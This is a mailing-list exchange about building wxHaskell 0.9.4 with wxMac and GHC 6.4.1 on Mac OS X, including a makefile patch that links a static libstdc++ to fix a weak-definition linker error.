- Commits:730f0df17db53b249b8680a14c40d12107c8e24e (qt/qtbase/5.12)
Description
DelayButton finishes in half delay time depending on the screen it's shown on
- Have a primary UHD-screen scaled to 200% and a secondary FullHD-screen scaled to 100%.
- Run the example "Qt Quick Extras - Gallery".
It's in Examples\Qt-5.9\quickcontrols\extras\gallery\gallery.pro
- Click on "DelayButton".
- Show the example on the primary screen.
- Click on the DelayButton and keep the mouse button pressed.
It will take 3 seconds until the DelayButton starts flashing. 3000ms is the default delay of a DelayButton.
- Click on the DelayButton.
It stops flashing.
- Move the example to the secondary screen.
- Click on the DelayButton and keep the mouse button pressed.
It will only take 1.5 seconds until the DelayButton starts flashing. If you set a higher delay, the example will still use only half the time on the secondary screen.
The DelayButton should always start flashing after the set delay, or after the default if not delay was set explicitly. By no means this duration should depend on the screen the DelayButton is shown on.
Another way to see the same effect is using the qmlpreview inside the QtDesignStudio and change the zoomfactor:
import QtQuick 2.9 Rectangle { visible: true width: 640 height: 1000 color: "blue" Rectangle { id: testRect y: 4 width: parent.width height: 10 } NumberAnimation { id: testAni target: testRect property: "height" running: true to: 1000 from: 0 loops: -1 duration: 10000 } }
Attachments
Issue Links
- is duplicated by
QTBUG-71094 animation runs faster after the qmlpreview refreshed the app
-
- Closed | https://bugreports.qt.io/browse/QTBUG-59660 | CC-MAIN-2022-21 | refinedweb | 323 | 59.5 |
Here's the assignment I was given:
The government introduces a new program of educational savings accounts. It adds a 20% bonus of whatever you contributed to the account up to a maximum of a $400 for a $2000 annual deposit. Create a program called CollegeSavings that obtains an amount deposited by the user and outputs the balance in the account including the bonus from the government.
So I set up this code
I know this is ridden with flaws but I just need to know where did I go wrong. If anyone was kind enough a revised code wouldn't hurt.I know this is ridden with flaws but I just need to know where did I go wrong. If anyone was kind enough a revised code wouldn't hurt.PHP Code:
import hsa.*;
// The "CollegeSavings" class.
public class CollegeSavings
{
public static void main (String[] args)
{double deposit, bonus, output;
Stdout.println("Please input annual deposit up to $2000 annual deposit");
deposit=Stdin.readDouble();
if (deposit>20000, bonus>400)
Stdout.println("Unacceptable entry");
else if (deposit<=2000, bonus<=400)
output=(deposit*1.20);
Stdout.println("College savings grant:" + "$" + output);}
// Place your code here
} // main method
} // CollegeSavings class | http://www.javaprogrammingforums.com/java-theory-questions/23257-what-wrong-my-code.html | CC-MAIN-2014-52 | refinedweb | 198 | 58.58 |
Applets are small applications that are accessed on an Internet Server, transported Internet, automatically installed, and run as part of a Web document.
Applet is a program written in Java and included or embedded in an HTML page. An applet is automatically loaded and executed when you open a web page that has the applet. The applet runs in a web page that is loaded in a web browser. The life cycle of an applet is implemented using methods, init(), start(), stop(), and destroy().
Once an applet arrives on the client, it has limited access to resources, so that it can produce an arbitrary multimedia user interface and run complex computations.
A sample applet:
import java.awt.*; import java.applet.*; public class SimpleApplet extends Applet { public void paint(Graphics g){ g.drawString("Hello World", 20,20); } }
Applet begins with two import statements
sincerelibran explained it very well though so there is not much left to say but I'll say it anyway.
When you run the applet code in java, it asks for a height and width then it runs your program. But after you entered the height and width, it automaticly made a HTML file where the applet was saved.
That HTML file is your applet you just executed. With this HTML, you can embed it into a web page for people to view and play online!
The applet snippet above draws "Hello World!" onto the screen at x coordinate 20 and y coordinate 20. To use the "public void paint(Graphics g)" you MUST import the java.awt.*; for the graphics to work.
Also (from past experience) the graphics class get draw right after the init class so any buttons or textfields will not be shown, but they are there. (just painted over).
Also you must import java.applet.*; to make the applet.
I hope that this answers your question.
javanoob101
well bullockc83,
I don't think there is much left to explain so mark this thread as "solved"?
Mmmmmmmm! Those do look good! :) | https://www.daniweb.com/programming/software-development/threads/342699/what-is-applet-in-java | CC-MAIN-2019-04 | refinedweb | 336 | 66.23 |
Cannot use Blynk with M5StickC +
Hello,
I'm certainly missing something super obvious here. So i need your help
I tried the sample code provided in the doc but it is not easy for me.
Also if you can point me to more tutorials on blynk feel free to do it.
Environment
- M5StickC+
- FW 1.9.8
- NCIR HAT
Issue
When using Blynk nothing happens in Run mode. M5Stick screen remains stalled, with Labels with its default value. Nothing also on the Blynk app side.
M5Stick works fine, when i remove all the blynk related stuff it works great. See other post for the code
What am I missing here?
from m5stack import * from m5ui import * from uiflow import * from IoTcloud import blynk import hat import hat setScreenColor(0x000000) hat_ncir_0 = hat.get(hat.NCIR) pool_temp_pin = None pool_temp = None label1 = M5TextBox(93, 58, "Text", lcd.FONT_DejaVu56, 0xFFFFFF, rotate=90) title0 = M5Title(title="Title", x=30, fgcolor=0xFFFFFF, bgcolor=0x0000FF) def blynk_read_v1(v_pin): global pool_temp_pin, pool_temp pool_temp_pin = v_pin pool_temp = hat_ncir_0.temperature title0.setTitle('Pool Temp') label1.setText(str(pool_temp)) blynk1.virtual_write(pool_temp, pool_temp) pass blynk1 = blynk.Blynk(token='1234567890') blynk1.handle_event('read v1', blynk_read_v1) while True: blynk1.run() wait_ms(2)
@candide are you trying to connect to the Blynk service with the white screen or the Blynk service with the black screen?
The white screen is Blynk V2 and not currently comparable with the M5Stack due to a change in security system (Blynk V2 uses the digital twin system that is no implemented yet in UIFlow). If it’s the black system V1 then there can be a delay and you need to regenerate the access key.
Thanks! I use v2 (white) so i don't have a solution since v1(black) does not allow new login creation and it is not compatible with v2 login
What else can i use to achieve the same goal. The goal beeing to be able to receive the temp data easily on a mobile phone or any remote device. Thanks
@candide There are many, many more services like M5Stack EZdata, Adafruit Io, Azure, AWS. I just published a book on amazon about these but can't find my manuscript! | https://forum.m5stack.com/topic/4394/cannot-use-blynk-with-m5stickc/2 | CC-MAIN-2022-40 | refinedweb | 364 | 73.17 |
jruby 9.0.4.0 (2.2.2) 2015-11-12 b9fb7aa Java HotSpot(TM) 64-Bit Server VM 24.79-b02 on 1.7.0_79-b15 +jit [Windows 7-amd64] I have the following Java class: ================================================== class JC { private Integer vi; public JC(int i) { vi = new Integer(i); } public void square() { vi = vi*vi; } public Integer get_int() { return vi; } } ================================================== I create (in the Java part of my code) an object of this class, and pass it to a Ruby method. On the Ruby side, I find that I can't invoke the method 'square', even though the object seems to be of the right type: ================================================== include Java class RCconn def initialize @doer = RC.new end def dispatch(jc) puts "Received object of type #{jc.class}" jc.square # @doer.do_your_duty(jc) jc end end ================================================== Inside dispatch, I get: Received object of type Java::Default::JC NoMethodError: undefined method `square' for #<Java::Default::JC:0xa124e5> dispatch at ...... What did I do wrong?
on 2015-11-20 14:30
on 2015-11-20 16:49
Ronald, Put the public modifier before your java class: public class JC { private Integer vi; public JC(int i) { vi = new Integer(i); } public void square() { vi = vi*vi; } public Integer get_int() { return vi; } } Move it to its own file and try again. The method, as you have it, is not accessible to Ruby. Cris
on 2015-11-20 17:20
Cris S. wrote in post #1179417: > Ronald, > > Put the public modifier before your java class Waaaaa! This works!!!! Could you explain, please, why this is necessary? I had JC defined in its own file before, and I could executed all its methods (they are public, after all) from my Java application. Why, then, can't Ruby see it? Does this have to do with package visibility? But I didn't use any package declaration. Ronald
on 2015-11-20 19:18
The other java files were in the same package, so they can see the package level methods. The private, protected, public (and java has no modifier -- package access (or friendly)) are a bit different then Ruby. I came from the java side first and I often get confused on the Ruby side :-). Cris
on 2015-11-20 19:21
Since you are all setup with this example... Answer for me a question. JRuby has the java_package method. If you set your Ruby class to the same package can you access your method w/o the public modifier? Cris
on 2015-11-23 12:40
Cris S. wrote in post #1179422: > JRuby has the java_package method. If you set your Ruby class to the > same package can you access your method w/o the public modifier? It didn't work, but I'm not sure, whether I did it in a right way. Since the Java class JC is in the global namespace, I added to my Ruby file after the include Java: java_package '' But maybe this is not the correct way to specify the global namespace. I searched several places for an explanation of how java_package works, but they don't explain handling the global namespace.
on 2015-11-23 16:23
I am not sure either how one would handle an unnamed package. I suspect you might have to package your code. Cris
on 2015-11-23 18:16
I'm still fighting with how to do packages properly in Java (I've opened a thread on this at...) - maybe, if you have time, you could have a look. It seems to be more difficult than expected, and as soon as I have a solution for this, I will try out java_package. Ronald
on 2015-11-23 18:53
Ronald, Are you aware that in java package structures mandate that your file be in an appropriate directory or compilation fails? If you have package 'phee.phi.pho' Then class 'Phum' must be in the directory phee/phi/pho. It must be in a file named Phum.java if it is has the public modifier before the keyword class. Cris
on 2015-11-23 19:17
Cris S. wrote in post #1179475: > Are you aware that in java package structures mandate that your file be > in an appropriate directory or compilation fails? I thought this is just a convention. It is strange: The compiler could see that the package name does not match the filename, but it did not complain ("file in a wrongly named directory" or something like this) when I compiled it. I will try to modify my example and let you know the findings. Ronald
on 2015-11-24 11:26
Cris S. wrote in post #1179475: > If you have package 'phee.phi.pho' Then class 'Phum' must be in the > directory phee/phi/pho. It must be in a file named Phum.java if it is > has the public modifier before the keyword class. I have now restructured file structure and code accordingly, but running the program now doesn't find the main class. I have attached all files to this message (jr7.zip), in case you would like to hava a look. On Windows, I would run it by executing jr7.bat. I have also isolated the error, since it is not related to java_import, and posted the problem here:...
on 2015-11-24 13:41
OK, fixed it now. There were several small changes necessary, which were not obvious - at least not to me. You find the updated test case in the attachment. As for the java_package on the Ruby side: This did not work as expected. I get the error message NameError: cannot load Java class DoIt I then changed back java_import 'DoIt' do .... to java_import 'foo.DoIt' do ... (although I think this should not be necessary, because we have a java_package 'foo' before that), but same effect. | https://www.ruby-forum.com/topic/6877191 | CC-MAIN-2018-39 | refinedweb | 971 | 73.78 |
Thanks, Felipe. On Mon, Jul 28, 2008 at 8:01 PM, Felipe Lessa <felipe.lessa at gmail.com>wrote: > 2008/7/28 Galchin, Vasili <vigalchin at gmail.com>: > >> and we're suggesting instead: > >> > >> newtype AIOCB = AIOCB (ForeignPtr AIOCB) > > > > ^^^ I am somewhat new to Haskell. Not a total newbie! But what > exactly > > does the above mean? Are the three references of "AIOCB" in different > > namespaces? > > The first and the third are the type AIOCB, the second is the type > constructor AIOCB. That is, it is equivalent (up to renaming) to > > newtype T = C (ForeignPtr T) > > Now, why use Type in Type's definition? It is obvious that if we were > creating > > data T = D T > > it would be pretty useless, however the type that ForeignPtr requires > is just a phantom type. In other words, the ForeignPtr will never use > the C constructor. > > An analogy to C: if you have > > typeA *pa; > typeB *pb; > > then of course pa and pb have different types, however their internal > representation are the same: an integral type of 32/64 bits. The C > compiler only uses the type to provide warnings, to know the fields' > offsets, the size of the structure, etc. The same goes for Haskell, if > you have > > pa :: ForeignPtr A > pb :: ForeignPtr B > > then both pa and pb have different types, but again they have the same > internal representation. However, for example, if you allocate memory > for pa via Storable then the compiler will find the correct sizeOf > definition because will gave the type hint. The compiler also won't > you let mix pa and pb like in [pa,pb]. > > > > So, if you declare > > newtype T = C (ForeignPtr T) > > you are: > > 1) Hiding the ForeignPtr from the users of your library if you don't export > C. > 2) Having type safeness by using ForeignPtr T instead of something > generic like ForeignPtr () -- the same as using typeA* instead of > void*. > 3) Not needing to create a different type, like > > data InternalT = InternalT > newtype T = C (ForeignPtr InternalT) > > > Well.. did it help at all? =) > > -- > Felipe. > -------------- next part -------------- An HTML attachment was scrubbed... URL: | http://www.haskell.org/pipermail/haskell-cafe/2008-July/045605.html | CC-MAIN-2014-41 | refinedweb | 348 | 72.16 |
Important: Please read the Qt Code of Conduct -
'MainWindow' does not name a type
hello guys ,
i have a class named MyClass like this :
#ifndef MYCLASS_H #define MYCLASS_H #include <QObject> #include "mainwindow.h" class MyClass : public QObject { Q_OBJECT public: explicit MyClass (QObject *parent = 0); static MainWindow * m_main ; static void NotifySystem(); public slots: }; #endif // MYCLASS_H
when i include the Myclass.h in my MainWindow.h the following error appears :
error: 'MainWindow' does not name a type MainWindow * m_main ; ^
it's something like Dependency Loop how can i use the MainWindow in other classes ?
- Chris Kawa Moderators last edited by
Yes, it's a dependency cycle.
There is no single answer. The general rule is you model your app like a tree - the top level class instantiates some children, these instantiate some more and so on. The rule is that you never include from above you co that you don't turn a tree into a graph with cycles.
MainWindow is usually kinda near or at the top so there shouldn't be (m)any things including it.
When you have a class included in mainwindow and you want to access mainwindow from that class it usually is a sign of bad design. The use of
staticthere only strengthens that belief.
The tree-like design is that mainwindow instantiates a child (a dialog, a panel, a manager or whatever), runs some methods on it and retrieves some data from it. The child instance should never know about a mainwindow or any parent for that matter. Everything should look downward.
What's your particular use case here? Maybe we can help you find the right design.
@Chris-Kawa thanks for your reply ,
i have a winapi class which has a CALLBACK function and it should be static (windows rules) in this function i need to update some controls based on callback result , so because callback is static i cant use SIGNAL/SLOT and i have to pass the mainwindows somehow to update it from static method , so how can i implement that without a bad design :D thanks .
i have used the
forward declarationto fix the error but it's not standard i'm looking for true way not hacky way
- ambershark Moderators last edited by ambershark
@MrOplus said in 'MainWindow' does not name a type:
i have used the
forward declarationto fix the error but it's not standard i'm looking for true way not hacky way
Forward declaration is not only standard but something you should strive for. It will speed up your builds tremendously. I try to almost never include things in my headers if I can avoid it.
The second thing here is you are breaking the rules of OOP if you have interdependent objects like that. Having an object use your main window is quite common but having you main window need that same object #include'd as well is quite abnormal.
So like @Chris-Kawa said it is definitely bad class design/oop. I would fix the design but barring that forward declaration will fix it. You should use forward declaration as much as possible in C++ though. The build speed benefits alone are worth it. :)
Oh and another potential fix is to not include myclass in your mainwindow.h. You can either forward declare there, or better yet just include it in the cpp. If your mainwindow relies on MyClass and MyClass relies on MainWindow that is the bad design part. An
Appledoesn't need to know anything about a
Wormbut the
Wormneeds to know about the
Appleto eat it. So including
Wormin
Applewould be bad since they aren't really related even though one can use/work with the other.
- Chris Kawa Moderators last edited by Chris Kawa
For C like apis (WinApi being an example) you usually create a wrapper class. That wrapper's sole purpose is to wrap the foreign api. It should not mangle with MainWindow. It can emit signals that MainWindow chooses to connect to. This way only MainWindow (higher in the tree) knows about a wrapper (includes it). A dumb wrapper can look like this:
class WinAPiWrapper : public QObject { Q_OBJECT public: WinAPiWrapper(QObject* parent = nullptr) : QObject(parent) { instance = this; } ~WinAPiWrapper() { instance = nullptr; } public slots: void CallSomeWinapi(int param, int param2) { WinApiFunc(param, param2, WinapiCallback); } signals: void SomeWinapiFinished(int ret_param) const; private: static void WinapiCallback(int ret_param) { if (instance) emit instance->SomeWinapiFinished(ret_param); } static WinAPiWrapper* instance; };
Of course it doesn't follow the rules of a good singleton for brevity. Make necessary adjustments.
Some callbacks are nicer than others. The nicer ones have a
void*or similar pointer for user data. This is often used to pass the
thispointer to them and get it back in the callback. With such callbacks you don't even need a singleton solution:
class WinAPiWrapper : public QObject { Q_OBJECT public: WinAPiWrapper(QObject* parent = nullptr) : QObject(parent) {} public slots: void CallSomeWinapi(int param, int param2) { WinApiFunc(param, param2, WinapiCallback, this); //assuming the last param is the void* user data } signals: void SomeWinapiFinished(int ret_param) const; private: static void WinapiCallback(int ret_param, void* user_data) { WinAPiWrapper* instance = reinterpret_cast<WinAPiWrapper*>(user_data); //get back the instance pointer from user data emit instance->SomeWinapiFinished(ret_param); } };
thanks everyone for your helps that's exactly what i want . | https://forum.qt.io/topic/74890/mainwindow-does-not-name-a-type | CC-MAIN-2021-39 | refinedweb | 875 | 59.94 |
AutoMapper is used in Visual Studio which is reusable component where it helps to copy data from one object type to other object type. Basically it does mapping automatically incase if
naming convention of property name found to be same.
Let us try to understand it in more detail from the below Visual Studio code, here we have Class Person and Class Student. If we want to copy data or transfer data from one class to other
we have traditional way of doing it.
First create object “per” of Class Person with following line of code
Person per = new Person();
With some data like First Name and Last Name.
per.FirstName = "Sadgopal";
per.LastName = "Khurana";
Next it to create object “std” of Class Student with following line of code
Student std = new Student();
And then transfer data from source Person Class to destination Student Class is done.
std.FirstName = per.FirstName;
std.LastName = per.LastName;
Tomorrow what if the data i.e. property in the class is increased then writing code for each property data moving from source class to destination class would be more hectic job. In other
words mapping of code is done again and again for source and destination. What if we get a solution where we can keep mapping code centrally and then it used again and again.
Here is where AutoMapper fits and sits in between source class and destination class. With this it will map the property data of both the objects when found property name to be same in
source and destination class.
AutoMapper is not in-build within Visual Studio it has to be installed from the NuGet packages, in order to do installation do a right click Solution > Manage NuGet Packages as shown in the
image down below.
It will open a new pane within Visual Studio with name “NuGet – Solution” as shown in the image down below.
On this pane now click in the “Browse” tab and on the search box type “AutoMapper” here on the search list you will find many AutoMapper’s. Click on the “AutoMapper by Jimmy
Bogard”.
After you click on the right side select existing project “ConsoleApplication3” by doing a checkmark on it and then below click on “Install”.
After you click on install it will prompt a preview window as shown in the image below which says that this installation will make changes internally to the existing selected project
“ConsoleApplication”. In order to proceed installation click OK. Once installation is done you will see details of successful AutoMapper installation down below in “Output” window.
To use installed AutoMapper next is to import name space by typing text “using AutoMapper” as shown in the below image. While writing text to import namespace intellisense will show
autocomplete text which states that AutoMapper is successfully installed.
Once Automapper namespace is imported, next creating Automapper is two steps process where first we have to create map and then use that map.
Create Map
Before we create map keep existing class Person created object “per” and its properties “FirstName” and “LastName” as it is.
Now create map by using following line of code
Mapper.CreateMap();
Here use mapper code with code line “CreateMap” between class Person and class Student.
Using Created Map
Create object “std” of class Student and use created map with object of class Person.
Student std = Mapper.Map(per);
After you finished writing the code Build entire solution to check for coding error if any. After Build is successfully done do place and debug point and run the program when you hover
mouse over the created map you will find the properties value of class Person in class Student.
Please Note: Here you will find that mapping of each property first name and last name was taken automatically between class Person and class Student. This is because naming
convention and property name are same in both class.
Consider the following image where we have property name different for both class Person and class Student. In class Person property name for First name is “FirstName” and Last name is
“LastName” while for class Student property name for First name is “FName” and Last name is “LName”.
Now here, we have to write each property mapping code for each class under our “Create Map” as shown below. We have to include “ForMember” by mentioning explicitly source is
“FirstName”/”LastName” of class Person and destination is “FName/LName” of class Student.
.ForMember(dest => dest.FName, opt => opt.MapFrom(src => src.FirstName)) .ForMember(dest => dest.LName, opt => opt.MapFrom(src => src.LastName))
With above line of code mapping for each property will done.
In this way we can use AutoMapper which is reusable component on our Visual Studio. Hope that the practical of AutoMapper is understood by the reader.
Also we would like to share that if you want to learn C# with full blown project below is starting first video from that series. Do follow this series and practice it your most of the
fundamentals with practical knowledge will also be covered. Hope that you will learn and gain the maximum from it.
Latest Articles
Latest Articles from Ahteshamax
Person per = new Person(); per.FirstName = "Siddi"; per.LastName = "Khadar"; var config = new MapperConfiguration( (cfg => { cfg.CreateMap<Person, Student>(); })); IMapper mapper = config.CreateMapper(); var dest = mapper.Map<Person, Student>(per);
Login to post response | http://www.dotnetfunda.com/articles/show/3450/using-automapper-in-csharp | CC-MAIN-2018-13 | refinedweb | 894 | 62.78 |
Core Concepts
This chapter discusses the concepts that are relevant when you monitor InterSystems IRIS®. This chapter includes the following sections:
Productions
A production is a specialized package of software and documentation that integrates multiple, potentially disparate software systems. A production includes elements that communicate with these external systems, as well as elements that perform processing that is internal to the production.
InterSystems IRIS permits only one production to be running in a given namespace at any given time.
A running production continues to run even when you close the Management Portal.
Production States
It is important to be familiar with the acceptable states of a production, as well as the problem states. These states are displayed in the Management Portal:
Business Hosts
A production includes a number of business hosts that communicate with each other (and with external systems). A business host is responsible for some category of work.
There are three distinct types of business host. In order to monitor a production, it is not necessary to know the details of why a given business host was implemented as a certain type. However, it is useful to be aware of the types:
A business service receives input from outside the production, sometimes by means of an inbound adapter.
A business process is responsible for communication and logic that is entirely within the production.
A business operation usually sends output from the production, sometimes by means of an outbound adapter.
Business operations can also be used for communication and logic within a given production.
Messages
Within a production, all communication is carried out by means of request and response messages between the business hosts. In order to understand a production at a high level, just remember that messages carry all traffic, and that the work of a production is to process messages.
Without exception, the production message warehouse stores all messages, and this information is available in the Management Portal. This section provides an overview of messages and the information that is available about them:
Sessions, which correspond to sets of messages related in time
Message Invocation Style and Time stamps
Message Basics
Every message is either a request or a response. There may be requests that do not have a corresponding response defined, but every response is (conceptually) paired with a request. Any request may be synchronous (waits for a response) or asynchronous (does not wait), depending on the details of the business host; you cannot configure this.
Each message has a unique numeric identifier or ID. This is displayed in many places in the Management Portal, with the caption ID or <ObjectId>, depending on the location on the page.
A message has a header, whose structure is the same for all messages. The header contains data fields that help route the message through the system. A message also contains a body, which provides different fields depending on the message type.
Each message uses a specific message body class, chosen by the production developers. The message body class determines whether the message is a request or a response and determines the fields that the message contains. These decisions are not configurable once the production is complete.
For Electronic Document Interchange (EDI) formats, InterSystems IRIS provides specialized message body classes that represent the message as a virtual document. In this case, the message body does not contain fields to represent data in the message. InterSystems IRIS provides alternative mechanisms for accessing that data. For an introduction, see Using Virtual Documents in Productions.
The Management Portal displays contents of the message as a whole, treating the message header and the message body as a single unit. The ID of the message header is the ID of the message as a whole. In some cases (for example, if you resend a message), a new header is added (with a new unique ID); as a result, the ID of the resent message is not the same as that of the original message.
Sessions
Every message is associated with a specific session. A session marks the beginning and end of all the activities prompted by a primary request message from outside InterSystems IRIS. Sessions are useful to you because they give you an easy way to see sets of related messages; the Management Portal provides an option for visually tracing the messages, and you can filter this display by session.
Each session has a unique numeric SessionID. All messages associated with a session use the same SessionID. InterSystems IRIS assigns these SessionIDs as follows:
The primary request message starts the session. The SessionID is the same as the ID of the primary request message.
Each additional message that is instantiated during this session has the same SessionID as the primary request, but has a unique message ID.
The following shows an example. Note that (unlike the example) the message IDs within a session are unlikely to be sequential in a production that has many business hosts. When creating a new message, InterSystems IRIS always uses the next available integer as the message ID.
Message Status
Each message has a life cycle during which its status changes. These statuses are visible on most pages that display messages. The possible status of any message is one of the following:
The message is in transit between its sender and the appropriate queue. This is the first stage in the normal life cycle of a message.
The message is on a queue. This is the second stage in the normal life cycle of a message.
The intended recipient has received the message. This is the third stage in the normal life cycle of a message.
The intended recipient has received the message and has finished processing the message. This is the fourth stage in the normal life cycle of a message.
This status applies only to response messages.
A business operation can defer a message response for later delivery. The response can be picked up and sent back to the original requester by any business host in the production. Between the time when the business operation defers the response, and when the response is finally sent, the response message has a status of Deferred.
The sender of the original message is unaware of the fact that the message was deferred. If the original call was synchronous, the call does not return to the sender until the response is sent.
When the response message is finally sent, it has a status of Completed.
A response message becomes Discarded if it reached its destination after the timeout period for the corresponding request expired.
You can also manually mark a message as Discarded, which you might do for a suspended message that cannot be delivered for some reason.
Note that a message that is marked as Discarded still remains in the permanent store; messages are deleted only when you explicitly delete them.
The message was suspended by the business operation after failing to reach its external destination or was manually suspended by an administrator. Note that some business operations are designed to set the status of any failed messages to Suspended.
In either case, you can view this message within the Management Portal to determine why it failed and you can resend it if appropriate. For example, if the problem is on the external side of the communication, the external system can be repaired, and then the message can be resent. You could also discard it or even delete it.
The message was aborted by an administrator.
The message encountered an error.
Note that request and response messages have separate statuses. Request-response pairs are not tracked together for various reasons: a request might be repeated several times before it is successfully delivered; some requests have an optional response that can be ignored if it does not arrive; some responses can be deferred for later delivery; some requests are designed to have no response.
Message Invocation Style and Time Stamps
Each message has an invocation style, which describes how the message was sent. The business host that sends a message specifies its invocation style:
Queue means the message is created in one job, then placed on a queue, at which time the original job is released. Later, when the message is processed, a different job will be allocated for the task.
Inproc means the message will be formulated, sent, and delivered in the same job in which it was created. The job will not be available again in the sender’s pool until the message is delivered to the target.
InterSystems IRIS records the following two time stamps for each message. Note that the invocation style affects the meaning of these time stamps:
The message creation time stamp. For Queue messages, this is when InterSystems IRIS placed this message on the queue. For Inproc messages, this is when InterSystems IRIS called the Send method.
The message processed time stamp. InterSystems IRIS sets TimeProcessed when the message is taken off of the queue but then resets it to the current time while the message is being processed. Typically, for a completed message, it represents the time that the message processing was completed.
Message Priority
The Management Portal displays the priority of the messages in several places. The priority of a message determines how that message is handled relative to other messages in the same message queue. For information about message queues, see the chapter “Monitoring a Production.”
The InterSystems IRIS messaging engine determines the priority of a message, which is one of the following:
HighSync (1) — Used for ACK messages and alarms for interrupted tasks.
Sync (2) — Used for synchronous messages.
SimSync (4) — Used for an asynchronous call made for a BPL synchronous <call>. This ensures that the request and response are processed before any queued asynchronous message.
Async (6) — Used for other asynchronous messages.
Jobs and Message Queues
The business hosts process messages by means of jobs. A job is a CPU process that hosts the work done by a production. This terminology is intended to avoid confusion between CPU processes (“jobs”) and business processes (“processes”).
In general, a job is either running (processing a message) or it is not running. From a low-level, system viewpoint, a production consists almost entirely of jobs waiting to wake up to perform work.
A pool consists of one or more jobs. Each business host can have its own, private pool of allocated jobs — a pool with a specific size that cannot be exceeded.
When a business host receives a message, the business host assigns the work to a job from its pool. The job then performs the work. If no job is available, the business host waits for a job to become available. After the job completes the work, the job either returns to the pool or starts work on another message.
More formally, each message is assigned to a specific message queue, which handles messages in the order that it receives them. Each queue is associated with a single pool, and vice versa.
Unlike other types of business host, a business process can use a public pool (called the actor pool), which receives messages from a public queue (called the actor queue or Ens.Actor
Opens in a new window). The actor pool and actor queue are shared by all business processes that do not use private pools and queues.
For further information, see “Pool Size and Actor Pool Size” in Configuring Productions. | https://docs.intersystems.com/healthconnectlatest/csp/docbook/DocBook.UI.Page.cls?KEY=EMONITOR_CONCEPTS | CC-MAIN-2021-25 | refinedweb | 1,902 | 54.32 |
Pipes can be used in threads and processes. The program below demonstrates how pipes can be used in processes. A new process can be created using the system call fork(). It returns two differnt values to the child and parent. The value 0 is returned to the child (new) process and the PID (Process ID) of the child is returned to the parent process. This is used to distinguish between the two processes. In the program given below, the child process waits for the user input and once an input is entered, it writes into the pipe. And the parent process reads from the pipe.
A sample program to demonstrate how pipes are used in Linux Processes
#include <stdio.h> #include <sys/types.h> #include <unistd.h> #include <stdlib.h> #include <string.h> #define MSGLEN 64 int main(){ int fd[2]; pid_t pid; int result; //Creating a pipe result = pipe (fd); if (result < 0) { //failure in creating a pipe perror("pipe"); exit (1); } //Creating a child process pid = fork(); if (pid < 0) { //failure in creating a child perror ("fork"); exit(2); } if (pid == 0) { //Child process char message[MSGLEN]; while(1) { //Clearing the message memset (message, 0, sizeof(message)); printf ("Enter a message: "); scanf ("%s",message); //Writing message to the pipe write(fd[1], message, strlen(message)); } exit (0); } else { //Parent Process char message[MSGLEN]; while (1) { //Clearing the message buffer memset (message, 0, sizeof(message)); //Reading message from the pipe read (fd[0], message, sizeof(message)); printf("Message entered %s\n",message); } exit(0); } }
Note here that the pipe() system call was called before the system call fork(). The buffer allocated to the pipe is accessible to both the processes. | https://linuxprograms.wordpress.com/category/pipes/ | CC-MAIN-2015-40 | refinedweb | 281 | 62.58 |
,
On 4 f=E9vr. 06, at 19:46, Jean Boucquey wrote:
> ! $(CXX) -r -keep_private_externs -nostdlib -o=20
> $(WXC-OUTDIR)/master.o $^ $(WXC-LIBS) /usr/lib/gcc/darwin/3.3/
This is interesting : what version of gcc did you use to compile=20
wxhaskell/wxWidgets/ghc?
I'm not entirely sure how this all fits together, but there might also=20=
have been some kind of version mismatch between the gcc's used to=20
compile ghc, wxWidgets and wxhaskell (indirectly through ghc).
Perhaps this version mismatch is what your fix ended up uncovering?=20
Because, otherwise, I'm a little puzzled as to why what wouldn't work=20
for you seems to work for me.
Hmm. Anyway, I guess what would be really sweet is something makes it=20=
possible to use wxhaskell without a static wxWidgets; this would=20
greatly simplify the DarwinPorts stuff.
Thanks,
--=20
Eric Kow
PGP Key ID: 08AC04F9 Merci de corriger mon fran=E7ais.
Hello,
Just to keep you updated: I finally succeeded to build wxHaskell =20
2.6.2 with GHC 6.4.1 on Mac OS 10.4.4.
The "trick" was to add a static C++ standard lib to the libraries =20
used to build "master.o" (see the patch hereafter).
As I'm not an Mac OS X expert, I don't know if this is valid but it =20
works (the linker now warns for duplicate symbols where before it was =20=
complaining that the symbol was undefined).
I compiled and ran the different sample applications. They all went =20
OK except the GLCanvas ones (I do not remember if I compiled wxMac =20
with OpenGL... I will check) and NotebookRight.hs that got an Haskell =20=
typing error.
Hope it helps,
Jean
*** wxhaskell-0.9.4/makefile Sun May 8 08:45:23 2005
--- wxhaskell-0.9.4-works/makefile Sat Feb 4 14:26:28 2006
***************
***)
$(CXX) -dynamiclib -install_name $(SHARED-PREFIX)$(notdir =20
$@) -undefined suppress -flat_namespace -o $@ $(WXC-OUTDIR)/master.o $=20=
(filter-out %.a,$(WXC-LIBS))
$(RM) -f $(WXC-OUTDIR)/master.o
---) /usr/lib/gcc/darwin/3.3/libstdc++.a
$(CXX) -dynamiclib -install_name $(SHARED-PREFIX)$(notdir =20
$@) -undefined suppress -flat_namespace -o $@ $(WXC-OUTDIR)/master.o $=20=
(filter-out %.a,$(WXC-LIBS))
$(RM) -f $(WXC-OUTDIR)/master.o
Le 01-f=E9vr.-06 =E0 20:49, Eric Kow a =E9crit :
> Hi,
>
> Yes, I have encountered this before, and it was very annoying.
> See:
>
> The thing that fixed it for me is --disable-shared with wxWidgets, =20
> which is odd because you seem to have configured with that as well.
>
> Maybe you should make sure you don't still have the shared version =20
> around. For example, you could do wx-config --libs
> and wxconfig --libs --static to see if they are different. If you =20
> want to keep both versions, maybe something like (wxhaskell) ./=20
> configure --wx-config=3D"wx-config --static" would help.
>
> Glad to know I'm not alone there. Luckily, we've also got Gregory =20
> Wright, the guy who takes care of haskell stuff on DarwinPorts, on =20
> our side :-)
>
> On 1 f=E9vr. 06, at 19:37, Jean Boucquey wrote:
>> I'm trying to build wxHaskell 0.9.4 with wxMac 2.6.1 (tried with =20
>> 2.6.2) and GHC 6.4.1 on MacOS 10.4.4 (gcc 4.0.0).
>> wxWidget is configured with --disable-shared and --disable-unicode.
>>
>> Compilation of the "wxc" layer goes fine but the linking of libwxc-=20=
>> mac2.6.1-0.9.4.dylib fails complaining about "weak definitions":
>> ld: out/wxc/master.o undefined symbol 36218 (__ZdaPv) can't be a =20
>> weak definition
>>
>> Before I dig into the "dirty" details, I would like to know if I =20
>> missed anything and/or if anybody encourtered this before (and =20
>> maybe knows the solution...).
>
>
> --=20
> Eric Kow
> PGP Key ID: 08AC04F9 Merci de corriger mon fran=E7ais.
>
>
